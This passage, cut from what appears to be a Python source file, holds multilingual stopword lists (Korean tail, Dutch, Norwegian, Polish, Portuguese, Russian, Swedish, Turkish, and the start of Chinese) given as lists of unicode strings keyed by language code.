들자면",u"예컨대",u"예하면",u"오",u"오로지",u"오르다",u"오자마자",u"오직",u"오호",u"오히려",u"와",u"와 같은 사람들",u"와르르",u"와아",u"왜",u"왜냐하면",u"외에도",u"요만큼",u"요만한 것",u"요만한걸",u"요컨대",u"우르르",u"우리",u"우리들",u"우선",u"우에 종합한것과같이",u"운운",u"월",u"위에서 서술한바와같이",u"위하여",u"위해서",u"윙윙",u"육",u"으로",u"으로 인하여",u"으로서",u"으로써",u"을",u"응",u"응당",u"의",u"의거하여",u"의지하여",u"의해",u"의해되다",u"의해서",u"이",u"이 되다",u"이 때문에",u"이 밖에",u"이 외에",u"이 정도의",u"이것",u"이곳",u"이때",u"이라면",u"이래",u"이러이러하다",u"이러한",u"이런",u"이럴정도로",u"이렇게 많은 것",u"이렇게되면",u"이렇게말하자면",u"이렇구나",u"이로 인하여",u"이르기까지",u"이리하여",u"이만큼",u"이번",u"이봐",u"이상",u"이어서",u"이었다",u"이와 같다",u"이와 같은",u"이와 반대로",u"이와같다면",u"이외에도",u"이용하여",u"이유만으로",u"이젠",u"이지만",u"이쪽",u"이천구",u"이천육",u"이천칠",u"이천팔",u"인 듯하다",u"인젠",u"일",u"일것이다",u"일곱",u"일단",u"일때",u"일반적으로",u"일지라도",u"임에 틀림없다",u"입각하여",u"입장에서",u"잇따라",u"있다",u"자",u"자기",u"자기집",u"자마자",u"자신",u"잠깐",u"잠시",u"저",u"저것",u"저것만큼",u"저기",u"저쪽",u"저희",u"전부",u"전자",u"전후",u"점에서 보아",u"정도에 이르다",u"제",u"제각기",u"제외하고",u"조금",u"조차",u"조차도",u"졸졸",u"좀",u"좋아",u"좍좍",u"주룩주룩",u"주저하지 않고",u"줄은 몰랏다",u"줄은모른다",u"중에서",u"중의하나",u"즈음하여",u"즉",u"즉시",u"지든지",u"지만",u"지말고",u"진짜로",u"쪽으로",u"차라리",u"참",u"참나",u"첫번째로",u"쳇",u"총적으로",u"총적으로 말하면",u"총적으로 보면",u"칠",u"콸콸",u"쾅쾅",u"쿵",u"타다",u"타인",u"탕탕",u"토하다",u"통하여",u"툭",u"퉤",u"틈타",u"팍",u"팔",u"퍽",u"펄렁",u"하",u"하게될것이다",u"하게하다",u"하겠는가",u"하고 있다",u"하고있었다",u"하곤하였다",u"하구나",u"하기 때문에",u"하기 위하여",u"하기는한데",u"하기만 하면",u"하기보다는",u"하기에",u"하나",u"하느니",u"하는 김에",u"하는 편이 낫다",u"하는것도",u"하는것만 못하다",u"하는것이 낫다",u"하는바",u"하더라도",u"하도다",u"하도록시키다",u"하도록하다",u"하든지",u"하려고하다",u"하마터면",u"하면 할수록",u"하면된다",u"하면서",u"하물며",u"하여금",u"하여야",u"하자마자",u"하지 않는다면",u"하지 않도록",u"하지마",u"하지마라",u"하지만",u"하하",u"한 까닭에",u"한 이유는",u"한 후",u"한다면",u"한다면 몰라도",u"한데",u"한마디",u"한적이있다",u"한켠으로는",u"한항목",u"할 따름이다",u"할 생각이다",u"할 줄 안다",u"할 지경이다",u"할 힘이 있다",u"할때",u"할만하다",u"할망정",u"할뿐",u"할수있다",u"할수있어",u"할줄알다",u"할지라도",u"할지언정",u"함께",u"해도된다",u"해도좋다",u"해봐요",u"해서는 안된다",u"해야한다",u"해요",u"했어요",u"향하다",u"향하여",u"향해서",u"허",u"허걱",u"허허",u"헉",u"헉헉",u"헐떡헐떡",u"형식으로 쓰여",u"혹시",u"혹은",u"혼자",u"훨씬",u"휘익",u"휴",u"흐흐",u"흥",u"힘입어",u"︿",u"!",u"#",u"$",u"%",u"&",u"(",u")",u"*",u"+",u",",u"0",u"1",u"2",u"3",u"4",u"5",u"6",u"7",u"8",u"9",u":",u";",u"<",u">",u"?",u"@",u"[",u"]",u"{",u"|",u"}",u"~",u"¥"],u"nl":[u"aan",u"achte",u"achter",u"af",u"al",u"alle",u"alleen",u"alles",u"als",u"ander",u"anders",u"beetje",u"behalve",u"beide",u"beiden",u"ben",u"beneden",u"bent",u"bij",u"bijna",u"bijv",u"blijkbaar",u"blijken",u"boven",u"bv",u"daar",u"daardoor",u"daarin",u"daarna",u"daarom",u"daaruit",u"dan",u"dat",u"de",u"deden",u"deed",u"derde",u"derhalve",u"dertig",u"deze",u"dhr",u"die",u"dit",u"doe",u"doen",u"doet",u"door",u"drie",u"duizend",u"echter",u"een",u"eens",u"eerst",u"eerste",u"eigen",u"eigenlijk",u"elk",u"elke",u"en",u"enige",u"er",u"erg",u"ergens",u"etc",u"etcetera",u"even",u"geen",u"genoeg",u"geweest",u"haar",u"haarzelf",u"had",u"hadden",u"heb",u"hebben",u"hebt",u"hedden",u"heeft",u"heel",u"hem",u"hemzelf",u"hen",u"het",u"hetzelfde",u"hier",u"hierin",u"hierna",u"hierom",u"hij",u"hijzelf",u"hoe",u"honderd",u"hun",u"ieder",u"iedere",u"iedereen",u"iemand",u"iets",u"ik",u"in",u"inderdaad",u"intussen",u"is",u"ja",u"je",u"jij",u"jijzelf",u"jou",u"jouw",u"jullie",u"kan",u"kon",u"konden",u"kun",u"kunnen",u"kunt",u"laatst",u"later",u"lijken",u"lijkt",u"maak",u"maakt",u"maakte",u"maakten",u"maar",u"mag",u"maken",u"me",u"meer",u"meest",u"meestal",u"men",u"met",u"mevr",u"mij",u"mijn",u"minder",u"miss",u"misschien",u"missen",u"mits",u"mocht",u"mochten",u"moest",u"moesten",u"moet",u"moeten",u"mogen",u"mr",u"mrs",u"mw",u"na",u"naar",u"nam",u"namelijk",u"nee",u"neem",u"negen",u"nemen",u"nergens",u"niemand",u"niet",u"niets",u"niks",u"noch",u"nochtans",u"nog",u"nooit",u"nu",u"nv",u"of",u"om",u"omdat",u"ondanks",u"onder",u"ondertussen",u"ons",u"onze",u"onzeker",u"ooit",u"ook",u"op",u"over",u"overal",u"overige",u"paar",u"per",u"recent",u"redelijk",u"samen",u"sinds",u"steeds",u"te",u"tegen",u"tegenover",u"thans",u"tien",u"tiende",u"tijdens",u"tja",u"toch",u"toe",u"tot",u"totdat",u"tussen",u"twee",u"tweede",u"u",u"uit",u"uw",u"vaak",u"van",u"vanaf",u"veel",u"veertig",u"verder",u"verscheidene",u"verschillende",u"via",u"vier",u"vierde",u"vijf",u"vijfde",u"vijftig",u"volgend",u"volgens",u"voor",u"voordat",u"voorts",u"waar",u"waarom",u"waarschijnlijk",u"wanneer",u"waren",u"was",u"wat",u"we",u"wederom",u"weer",u"weinig",u"wel",u"welk",u"welke",u"werd",u"werden",u"werder",u"whatever",u"wie",u"wij",u"wijzelf",u"wil",u"wilden",u"willen",u"word",u"worden",u"wordt",u"zal",u"ze",u"zei",u"zeker",u"zelf",u"zelfde",u"zes",u"zeven",u"zich",u"zij",u"zijn",u"zijzelf",u"zo",u"zoals",u"zodat",u"zou",u"zouden",u"zulk",u"zullen"],u"no":[u"alle",u"at",u"av",u"bare",u"begge",u"ble",u"blei",u"bli",u"blir",u"blitt",u"både",u"båe",u"da",u"de",u"deg",u"dei",u"deim",u"deira",u"deires",u"dem",u"den",u"denne",u"der",u"dere",u"deres",u"det",u"dette",u"di",u"din",u"disse",u"ditt",u"du",u"dykk",u"dykkar",u"då",u"eg",u"ein",u"eit",u"eitt",u"eller",u"elles",u"en",u"enn",u"er",u"et",u"ett",u"etter",u"for",u"fordi",u"fra",u"før",u"ha",u"hadde",u"han",u"hans",u"har",u"hennar",u"henne",u"hennes",u"her",u"hjå",u"ho",u"hoe",u"honom",u"hoss",u"hossen",u"hun",u"hva",u"hvem",u"hver",u"hvilke",u"hvilken",u"hvis",u"hvor",u"hvordan",u"hvorfor",u"i",u"ikke",u"ikkje",u"ingen",u"ingi",u"inkje",u"inn",u"inni",u"ja",u"jeg",u"kan",u"kom",u"korleis",u"korso",u"kun",u"kunne",u"kva",u"kvar",u"kvarhelst",u"kven",u"kvi",u"kvifor",u"man",u"mange",u"me",u"med",u"medan",u"meg",u"meget",u"mellom",u"men",u"mi",u"min",u"mine",u"mitt",u"mot",u"mykje",u"ned",u"no",u"noe",u"noen",u"noka",u"noko",u"nokon",u"nokor",u"nokre",u"nå",u"når",u"og",u"også",u"om",u"opp",u"oss",u"over",u"på",u"samme",u"seg",u"selv",u"si",u"sia",u"sidan",u"siden",u"sin",u"sine",u"sitt",u"sjøl",u"skal",u"skulle",u"slik",u"so",u"som",u"somme",u"somt",u"så",u"sånn",u"til",u"um",u"upp",u"ut",u"uten",u"var",u"vart",u"varte",u"ved",u"vere",u"verte",u"vi",u"vil",u"ville",u"vore",u"vors",u"vort",u"vår",u"være",u"vært",u"å"],u"pl":[u"aby",u"ach",u"aj",u"albo",u"ale",u"ani",u"aż",u"bardzo",u"bez",u"bo",u"bowiem",u"by",u"byli",u"bym",u"być",u"był",u"była",u"było",u"były",u"będzie",u"będą",u"chce",u"choć",u"ci",u"ciebie",u"cię",u"co",u"coraz",u"coś",u"czy",u"czyli",u"często",u"daleko",u"dla",u"dlaczego",u"dlatego",u"do",u"dobrze",u"dokąd",u"dość",u"dr",u"dużo",u"dwa",u"dwaj",u"dwie",u"dwoje",u"dzisiaj",u"dziś",u"gdy",u"gdyby",u"gdyż",u"gdzie",u"go",u"godz",u"hab",u"i",u"ich",u"ii",u"iii",u"ile",u"im",u"inne",u"inny",u"inż",u"iv",u"ix",u"iż",u"ja",u"jak",u"jakby",u"jaki",u"jakie",u"jako",u"je",u"jeden",u"jedna",u"jednak",u"jedno",u"jednym",u"jedynie",u"jego",u"jej",u"jemu",u"jest",u"jestem",u"jeszcze",u"jeśli",u"jeżeli",u"już",u"ją",u"każdy",u"kiedy",u"kierunku",u"kilku",u"kto",u"która",u"które",u"którego",u"której",u"który",u"których",u"którym",u"którzy",u"ku",u"lat",u"lecz",u"lub",u"ma",u"mają",u"mam",u"mamy",u"mgr",u"mi",u"miał",u"mimo",u"mnie",u"mną",u"mogą",u"moi",u"moja",u"moje",u"może",u"można",u"mu",u"musi",u"my",u"mój",u"na",u"nad",u"nam",u"nami",u"nas",u"nasi",u"nasz",u"nasza",u"nasze",u"natychmiast",u"nawet",u"nic",u"nich",u"nie",u"niego",u"niej",u"niemu",u"nigdy",u"nim",u"nimi",u"nią",u"niż",u"no",u"nowe",u"np",u"nr",u"o",u"o.o.",u"obok",u"od",u"ok",u"około",u"on",u"ona",u"one",u"oni",u"ono",u"oraz",u"owszem",u"pan",u"pl",u"po",u"pod",u"ponad",u"ponieważ",u"poza",u"prof",u"przed",u"przede",u"przedtem",u"przez",u"przy",u"raz",u"razie",u"roku",u"również",u"sam",u"sama",u"się",u"skąd",u"sobie",u"sposób",u"swoje",u"są",u"ta",u"tak",u"taki",u"takich",u"takie",u"także",u"tam",u"te",u"tego",u"tej",u"tel",u"temu",u"ten",u"teraz",u"też",u"to",u"tobie",u"tobą",u"trzeba",u"tu",u"tutaj",u"twoi",u"twoja",u"twoje",u"twój",u"ty",u"tych",u"tylko",u"tym",u"tys",u"tzw",u"tę",u"u",u"ul",u"vi",u"vii",u"viii",u"vol",u"w",u"wam",u"wami",u"was",u"wasi",u"wasz",u"wasza",u"wasze",u"we",u"wie",u"więc",u"wszystko",u"wtedy",u"www",u"wy",u"właśnie",u"wśród",u"xi",u"xii",u"xiii",u"xiv",u"xv",u"z",u"za",u"zawsze",u"zaś",u"ze",u"zł",u"żaden",u"że",u"żeby"],u"pt":[u"a",u"acerca",u"adeus",u"agora",u"ainda",u"algmas",u"algo",u"algumas",u"alguns",u"ali",u"além",u"ambos",u"ano",u"anos",u"antes",u"ao",u"aos",u"apenas",u"apoio",u"apontar",u"após",u"aquela",u"aquelas",u"aquele",u"aqueles",u"aqui",u"aquilo",u"as",u"assim",u"através",u"atrás",u"até",u"aí",u"baixo",u"bastante",u"bem",u"bom",u"breve",u"cada",u"caminho",u"catorze",u"cedo",u"cento",u"certamente",u"certeza",u"cima",u"cinco",u"coisa",u"com",u"como",u"comprido",u"conhecido",u"conselho",u"contra",u"corrente",u"custa",u"cá",u"da",u"daquela",u"daquele",u"dar",u"das",u"de",u"debaixo",u"demais",u"dentro",u"depois",u"desde",u"desligado",u"dessa",u"desse",u"desta",u"deste",u"deve",u"devem",u"deverá",u"dez",u"dezanove",u"dezasseis",u"dezassete",u"dezoito",u"dia",u"diante",u"direita",u"diz",u"dizem",u"dizer",u"do",u"dois",u"dos",u"doze",u"duas",u"dá",u"dão",u"dúvida",u"e",u"ela",u"elas",u"ele",u"eles",u"em",u"embora",u"enquanto",u"entre",u"então",u"era",u"essa",u"essas",u"esse",u"esses",u"esta",u"estado",u"estar",u"estará",u"estas",u"estava",u"este",u"estes",u"esteve",u"estive",u"estivemos",u"estiveram",u"estiveste",u"estivestes",u"estou",u"está",u"estás",u"estão",u"eu",u"exemplo",u"falta",u"fará",u"favor",u"faz",u"fazeis",u"fazem",u"fazemos",u"fazer",u"fazes",u"fazia",u"faço",u"fez",u"fim",u"final",u"foi",u"fomos",u"for",u"fora",u"foram",u"forma",u"foste",u"fostes",u"fui",u"geral",u"grande",u"grandes",u"grupo",u"hoje",u"horas",u"há",u"iniciar",u"inicio",u"ir",u"irá",u"isso",u"ista",u"iste",u"isto",u"já",u"lado",u"ligado",u"local",u"logo",u"longe",u"lugar",u"lá",u"maior",u"maioria",u"maiorias",u"mais",u"mal",u"mas",u"me",u"meio",u"menor",u"menos",u"meses",u"mesmo",u"meu",u"meus",u"mil",u"minha",u"minhas",u"momento",u"muito",u"muitos",u"máximo",u"mês",u"na",u"nada",u"naquela",u"naquele",u"nas",u"nem",u"nenhuma",u"nessa",u"nesse",u"nesta",u"neste",u"no",u"noite",u"nome",u"nos",u"nossa",u"nossas",u"nosso",u"nossos",u"nova",u"nove",u"novo",u"novos",u"num",u"numa",u"nunca",u"não",u"nível",u"nós",u"número",u"o",u"obra",u"obrigada",u"obrigado",u"oitava",u"oitavo",u"oito",u"onde",u"ontem",u"onze",u"os",u"ou",u"outra",u"outras",u"outro",u"outros",u"para",u"parece",u"parte",u"partir",u"pegar",u"pela",u"pelas",u"pelo",u"pelos",u"perto",u"pessoas",u"pode",u"podem",u"poder",u"poderá",u"podia",u"ponto",u"pontos",u"por",u"porque",u"porquê",u"posição",u"possivelmente",u"posso",u"possível",u"pouca",u"pouco",u"povo",u"primeira",u"primeiro",u"promeiro",u"próprio",u"próximo",u"puderam",u"pôde",u"põe",u"põem",u"qual",u"qualquer",u"quando",u"quanto",u"quarta",u"quarto",u"quatro",u"que",u"quem",u"quer",u"quero",u"questão",u"quieto",u"quinta",u"quinto",u"quinze",u"quê",u"relação",u"sabe",u"saber",u"se",u"segunda",u"segundo",u"sei",u"seis",u"sem",u"sempre",u"ser",u"seria",u"sete",u"seu",u"seus",u"sexta",u"sexto",u"sim",u"sistema",u"sob",u"sobre",u"sois",u"somente",u"somos",u"sou",u"sua",u"suas",u"são",u"sétima",u"sétimo",u"tal",u"talvez",u"também",u"tanto",u"tarde",u"te",u"tem",u"temos",u"tempo",u"tendes",u"tenho",u"tens",u"tentar",u"tentaram",u"tente",u"tentei",u"ter",u"terceira",u"terceiro",u"teu",u"teus",u"teve",u"tipo",u"tive",u"tivemos",u"tiveram",u"tiveste",u"tivestes",u"toda",u"todas",u"todo",u"todos",u"trabalhar",u"trabalho",u"treze",u"três",u"tu",u"tua",u"tuas",u"tudo",u"tão",u"têm",u"um",u"uma",u"umas",u"uns",u"usa",u"usar",u"vai",u"vais",u"valor",u"veja",u"vem",u"vens",u"ver",u"verdade",u"verdadeiro",u"vez",u"vezes",u"viagem",u"vindo",u"vinte",u"você",u"vocês",u"vos",u"vossa",u"vossas",u"vosso",u"vossos",u"vários",u"vão",u"vêm",u"vós",u"zero",u"à",u"às",u"área",u"é",u"és",u"último"],u"ru":[u"а",u"алло",u"без",u"белый",u"близко",u"более",u"больше",u"большой",u"будем",u"будет",u"будете",u"будешь",u"будто",u"буду",u"будут",u"будь",u"бы",u"бывает",u"бывь",u"был",u"была",u"были",u"было",u"быть",u"в",u"важная",u"важное",u"важные",u"важный",u"вам",u"вами",u"вас",u"ваш",u"ваша",u"ваше",u"ваши",u"вверх",u"вдали",u"вдруг",u"ведь",u"везде",u"вернуться",u"весь",u"вечер",u"взгляд",u"взять",u"вид",u"видеть",u"вместе",u"вниз",u"внизу",u"во",u"вода",u"война",u"вокруг",u"вон",u"вообще",u"вопрос",u"восемнадцатый",u"восемнадцать",u"восемь",u"восьмой",u"вот",u"впрочем",u"времени",u"время",u"все",u"всегда",u"всего",u"всем",u"всеми",u"всему",u"всех",u"всею",u"всю",u"всюду",u"вся",u"всё",u"второй",u"вы",u"выйти",u"г",u"где",u"главный",u"глаз",u"говорил",u"говорит",u"говорить",u"год",u"года",u"году",u"голова",u"голос",u"город",u"да",u"давать",u"давно",u"даже",u"далекий",u"далеко",u"дальше",u"даром",u"дать",u"два",u"двадцатый",u"двадцать",u"две",u"двенадцатый",u"двенадцать",u"дверь",u"двух",u"девятнадцатый",u"девятнадцать",u"девятый",u"девять",u"действительно",u"дел",u"делать",u"дело",u"день",u"деньги",u"десятый",u"десять",u"для",u"до",u"довольно",u"долго",u"должно",u"должный",u"дом",u"дорога",u"друг",u"другая",u"другие",u"других",u"друго",u"другое",u"другой",u"думать",u"душа",u"е",u"его",u"ее",u"ей",u"ему",u"если",u"есть",u"еще",u"ещё",u"ею",u"её",u"ж",u"ждать",u"же",u"жена",u"женщина",u"жизнь",u"жить",u"за",u"занят",u"занята",u"занято",u"заняты",u"затем",u"зато",u"зачем",u"здесь",u"земля",u"знать",u"значит",u"значить",u"и",u"идти",u"из",u"или",u"им",u"именно",u"иметь",u"ими",u"имя",u"иногда",u"их",u"к",u"каждая",u"каждое",u"каждые",u"каждый",u"кажется",u"казаться",u"как",u"какая",u"какой",u"кем",u"книга",u"когда",u"кого",u"ком",u"комната",u"кому",u"конец",u"конечно",u"которая",u"которого",u"которой",u"которые",u"который",u"которых",u"кроме",u"кругом",u"кто",u"куда",u"лежать",u"лет",u"ли",u"лицо",u"лишь",u"лучше",u"любить",u"люди",u"м",u"маленький",u"мало",u"мать",u"машина",u"между",u"меля",u"менее",u"меньше",u"меня",u"место",u"миллионов",u"мимо",u"минута",u"мир",u"мира",u"мне",u"много",u"многочисленная",u"многочисленное",u"многочисленные",u"многочисленный",u"мной",u"мною",u"мог",u"могут",u"мож",u"может",u"можно",u"можхо",u"мои",u"мой",u"мор",u"москва",u"мочь",u"моя",u"моё",u"мы",u"на",u"наверху",u"над",u"надо",u"назад",u"наиболее",u"найти",u"наконец",u"нам",u"нами",u"народ",u"нас",u"начала",u"начать",u"наш",u"наша",u"наше",u"наши",u"не",u"него",u"недавно",u"недалеко",u"нее",u"ней",u"некоторый",u"нельзя",u"нем",u"немного",u"нему",u"непрерывно",u"нередко",u"несколько",u"нет",u"нею",u"неё",u"ни",u"нибудь",u"ниже",u"низко",u"никакой",u"никогда",u"никто",u"никуда",u"ними",u"них",u"ничего",u"ничто",u"но",u"новый",u"нога",u"ночь",u"ну",u"нужно",u"нужный",u"нх",u"о",u"об",u"оба",u"обычно",u"один",u"одиннадцатый",u"одиннадцать",u"однажды",u"однако",u"одного",u"одной",u"оказаться",u"окно",u"около",u"он",u"она",u"они",u"оно",u"опять",u"особенно",u"остаться",u"от",u"ответить",u"отец",u"отовсюду",u"отсюда",u"очень",u"первый",u"перед",u"писать",u"плечо",u"по",u"под",u"подумать",u"пожалуйста",u"позже",u"пойти",u"пока",u"пол",u"получить",u"помнить",u"понимать",u"понять",u"пор",u"пора",u"после",u"последний",u"посмотреть",u"посреди",u"потом",u"потому",u"почему",u"почти",u"правда",u"прекрасно",u"при",u"про",u"просто",u"против",u"процентов",u"пятнадцатый",u"пятнадцать",u"пятый",u"пять",u"работа",u"работать",u"раз",u"разве",u"рано",u"раньше",u"ребенок",u"решить",u"россия",u"рука",u"русский",u"ряд",u"рядом",u"с",u"сам",u"сама",u"сами",u"самим",u"самими",u"самих",u"само",u"самого",u"самой",u"самом",u"самому",u"саму",u"самый",u"свет",u"свое",u"своего",u"своей",u"свои",u"своих",u"свой",u"свою",u"сделать",u"сеаой",u"себе",u"себя",u"сегодня",u"седьмой",u"сейчас",u"семнадцатый",u"семнадцать",u"семь",u"сидеть",u"сила",u"сих",u"сказал",u"сказала",u"сказать",u"сколько",u"слишком",u"слово",u"случай",u"смотреть",u"сначала",u"снова",u"со",u"собой",u"собою",u"советский",u"совсем",u"спасибо",u"спросить",u"сразу",u"стал",u"старый",u"стать",u"стол",u"сторона",u"стоять",u"страна",u"суть",u"считать",u"т",u"та",u"так",u"такая",u"также",u"таки",u"такие",u"такое",u"такой",u"там",u"твой",u"твоя",u"твоё",u"те",u"тебе",u"тебя",u"тем",u"теми",u"теперь",u"тех",u"то",u"тобой",u"тобою",u"товарищ",u"тогда",u"того",u"тоже",u"только",u"том",u"тому",u"тот",u"тою",u"третий",u"три",u"тринадцатый",u"тринадцать",u"ту",u"туда",u"тут",u"ты",u"тысяч",u"у",u"увидеть",u"уж",u"уже",u"улица",u"уметь",u"утро",u"хороший",u"хорошо",u"хотеть",u"хоть",u"хотя",u"хочешь",u"час",u"часто",u"часть",u"чаще",u"чего",u"человек",u"чем",u"чему",u"через",u"четвертый",u"четыре",u"четырнадцатый",u"четырнадцать",u"что",u"чтоб",u"чтобы",u"чуть",u"шестнадцатый",u"шестнадцать",u"шестой",u"шесть",u"эта",u"эти",u"этим",u"этими",u"этих",u"это",u"этого",u"этой",u"этом",u"этому",u"этот",u"эту",u"я"],u"sv":[u"aderton",u"adertonde",u"adjö",u"aldrig",u"alla",u"allas",u"allt",u"alltid",u"alltså",u"andra",u"andras",u"annan",u"annat",u"artonde",u"artonn",u"att",u"av",u"bakom",u"bara",u"behöva",u"behövas",u"behövde",u"behövt",u"beslut",u"beslutat",u"beslutit",u"bland",u"blev",u"bli",u"blir",u"blivit",u"bort",u"borta",u"bra",u"bäst",u"bättre",u"båda",u"bådas",u"dag",u"dagar",u"dagarna",u"dagen",u"de",u"del",u"delen",u"dem",u"den",u"denna",u"deras",u"dess",u"dessa",u"det",u"detta",u"dig",u"din",u"dina",u"dit",u"ditt",u"dock",u"du",u"där",u"därför",u"då",u"efter",u"eftersom",u"ej",u"elfte",u"eller",u"elva",u"en",u"enkel",u"enkelt",u"enkla",u"enligt",u"er",u"era",u"ert",u"ett",u"ettusen",u"fanns",u"fem",u"femte",u"femtio",u"femtionde",u"femton",u"femtonde",u"fick",u"fin",u"finnas",u"finns",u"fjorton",u"fjortonde",u"fjärde",u"fler",u"flera",u"flesta",u"fram",u"framför",u"från",u"fyra",u"fyrtio",u"fyrtionde",u"få",u"får",u"fått",u"följande",u"för",u"före",u"förlåt",u"förra",u"första",u"genast",u"genom",u"gick",u"gjorde",u"gjort",u"god",u"goda",u"godare",u"godast",u"gott",u"gälla",u"gäller",u"gällt",u"gärna",u"gå",u"går",u"gått",u"gör",u"göra",u"ha",u"hade",u"haft",u"han",u"hans",u"har",u"heller",u"hellre",u"helst",u"helt",u"henne",u"hennes",u"hit",u"hon",u"honom",u"hundra",u"hundraen",u"hundraett",u"hur",u"här",u"hög",u"höger",u"högre",u"högst",u"i",u"ibland",u"icke",u"idag",u"igen",u"igår",u"imorgon",u"in",u"inför",u"inga",u"ingen",u"ingenting",u"inget",u"innan",u"inne",u"inom",u"inte",u"inuti",u"ja",u"jag",u"ju",u"jämfört",u"kan",u"kanske",u"knappast",u"kom",u"komma",u"kommer",u"kommit",u"kr",u"kunde",u"kunna",u"kunnat",u"kvar",u"legat",u"ligga",u"ligger",u"lika",u"likställd",u"likställda",u"lilla",u"lite",u"liten",u"litet",u"länge",u"längre",u"längst",u"lätt",u"lättare",u"lättast",u"långsam",u"långsammare",u"långsammast",u"långsamt",u"långt",u"man",u"med",u"mellan",u"men",u"mer",u"mera",u"mest",u"mig",u"min",u"mina",u"mindre",u"minst",u"mitt",u"mittemot",u"mot",u"mycket",u"många",u"måste",u"möjlig",u"möjligen",u"möjligt",u"möjligtvis",u"ned",u"nederst",u"nedersta",u"nedre",u"nej",u"ner",u"ni",u"nio",u"nionde",u"nittio",u"nittionde",u"nitton",u"nittonde",u"nog",u"noll",u"nr",u"nu",u"nummer",u"när",u"nästa",u"någon",u"någonting",u"något",u"några",u"nödvändig",u"nödvändiga",u"nödvändigt",u"nödvändigtvis",u"och",u"också",u"ofta",u"oftast",u"olika",u"olikt",u"om",u"oss",u"på",u"rakt",u"redan",u"rätt",u"sade",u"sagt",u"samma",u"sedan",u"senare",u"senast",u"sent",u"sex",u"sextio",u"sextionde",u"sexton",u"sextonde",u"sig",u"sin",u"sina",u"sist",u"sista",u"siste",u"sitt",u"sitta",u"sju",u"sjunde",u"sjuttio",u"sjuttionde",u"sjutton",u"sjuttonde",u"själv",u"sjätte",u"ska",u"skall",u"skulle",u"slutligen",u"små",u"smått",u"snart",u"som",u"stor",u"stora",u"stort",u"större",u"störst",u"säga",u"säger",u"sämre",u"sämst",u"så",u"sådan",u"sådana",u"sådant",u"tack",u"tidig",u"tidigare",u"tidigast",u"tidigt",u"till",u"tills",u"tillsammans",u"tio",u"tionde",u"tjugo",u"tjugoen",u"tjugoett",u"tjugonde",u"tjugotre",u"tjugotvå",u"tjungo",u"tolfte",u"tolv",u"tre",u"tredje",u"trettio",u"trettionde",u"tretton",u"trettonde",u"två",u"tvåhundra",u"under",u"upp",u"ur",u"ursäkt",u"ut",u"utan",u"utanför",u"ute",u"vad",u"var",u"vara",u"varför",u"varifrån",u"varit",u"varje",u"varken",u"vars",u"varsågod",u"vart",u"vem",u"vems",u"verkligen",u"vi",u"vid",u"vidare",u"viktig",u"viktigare",u"viktigast",u"viktigt",u"vilka",u"vilkas",u"vilken",u"vilket",u"vill",u"vänster",u"vänstra",u"värre",u"vår",u"våra",u"vårt",u"än",u"ännu",u"är",u"även",u"åt",u"åtminstone",u"åtta",u"åttio",u"åttionde",u"åttonde",u"över",u"övermorgon",u"överst",u"övre"],u"tr":[u"acaba",u"acep",u"adeta",u"altmýþ",u"altmış",u"altý",u"altı",u"ama",u"ancak",u"arada",u"artýk",u"aslında",u"aynen",u"ayrıca",u"az",u"bana",u"bari",u"bazen",u"bazý",u"bazı",u"baţka",u"belki",u"ben",u"benden",u"beni",u"benim",u"beri",u"beþ",u"beş",u"beţ",u"bile",u"bin",u"bir",u"biraz",u"biri",u"birkaç",u"birkez",u"birçok",u"birþey",u"birþeyi",u"birşey",u"birşeyi",u"birţey",u"biz",u"bizden",u"bize",u"bizi",u"bizim",u"bu",u"buna",u"bunda",u"bundan",u"bunlar",u"bunları",u"bunların",u"bunu",u"bunun",u"burada",u"böyle",u"böylece",u"bütün",u"da",u"daha",u"dahi",u"dahil",u"daima",u"dair",u"dayanarak",u"de",u"defa",u"deđil",u"değil",u"diye",u"diđer",u"diğer",u"doksan",u"dokuz",u"dolayı",u"dolayısıyla",u"dört",u"edecek",u"eden",u"ederek",u"edilecek",u"ediliyor",u"edilmesi",u"ediyor",u"elli",u"en",u"etmesi",u"etti",u"ettiği",u"ettiğini",u"eđer",u"eğer",u"fakat",u"gibi",u"göre",u"halbuki",u"halen",u"hangi",u"hani",u"hariç",u"hatta",u"hele",u"hem",u"henüz",u"hep",u"hepsi",u"her",u"herhangi",u"herkes",u"herkesin",u"hiç",u"hiçbir",u"iken",u"iki",u"ila",u"ile",u"ilgili",u"ilk",u"illa",u"ise",u"itibaren",u"itibariyle",u"iyi",u"iyice",u"için",u"işte",u"iţte",u"kadar",u"kanýmca",u"karşın",u"katrilyon",u"kendi",u"kendilerine",u"kendini",u"kendisi",u"kendisine",u"kendisini",u"kere",u"kez",u"keţke",u"ki",u"kim",u"kimden",u"kime",u"kimi",u"kimse",u"kýrk",u"kýsaca",u"kırk",u"lakin",u"madem",u"međer",u"milyar",u"milyon",u"mu",u"mü",u"mý",u"mı",u"nasýl",u"nasıl",u"ne",u"neden",u"nedenle",u"nerde",u"nere",u"nerede",u"nereye",u"nitekim",u"niye",u"niçin",u"o",u"olan",u"olarak",u"oldu",u"olduklarını",u"olduğu",u"olduğunu",u"olmadı",u"olmadığı",u"olmak",u"olması",u"olmayan",u"olmaz",u"olsa",u"olsun",u"olup",u"olur",u"olursa",u"oluyor",u"on",u"ona",u"ondan",u"onlar",u"onlardan",u"onlari",u"onlarýn",u"onları",u"onların",u"onu",u"onun",u"otuz",u"oysa",u"pek",u"rağmen",u"sadece",u"sanki",u"sekiz",u"seksen",u"sen",u"senden",u"seni",u"senin",u"siz",u"sizden",u"sizi",u"sizin",u"sonra",u"tarafından",u"trilyon",u"tüm",u"var",u"vardı",u"ve",u"veya",u"veyahut",u"ya",u"yahut",u"yani",u"yapacak",u"yapmak",u"yaptı",u"yaptıkları",u"yaptığı",u"yaptığını",u"yapılan",u"yapılması",u"yapıyor",u"yedi",u"yerine",u"yetmiþ",u"yetmiş",u"yetmiţ",u"yine",u"yirmi",u"yoksa",u"yüz",u"zaten",u"çok",u"çünkü",u"öyle",u"üzere",u"üç",u"þey",u"þeyden",u"þeyi",u"þeyler",u"þu",u"þuna",u"þunda",u"þundan",u"þunu",u"şey",u"şeyden",u"şeyi",u"şeyler",u"şu",u"şuna",u"şunda",u"şundan",u"şunları",u"şunu",u"şöyle",u"ţayet",u"ţimdi",u"ţu",u"ţöyle"],u"zh":[u"、",u"。",u"〈",u"〉",u"《",u"》",u"一",u"一切",u"一则",u"一方面",u"一旦",u"一来",u"一样",u"一般",u"七",u"万一",u"三",u"上下",u"不仅",u"不但",u"不光",u"不单",u"不只",u"不如",u"不怕",u"不惟",u"不成",u"不拘",u"不比",u"不然",u"不特",u"不独",u"不管",u"不论",u"不过",u"不问",u"与",u"与其",u"与否",u"与此同时",u"且",u"两者",u"个",u"临",u"为",u"为了",u"为什么",u"为何",u"为着"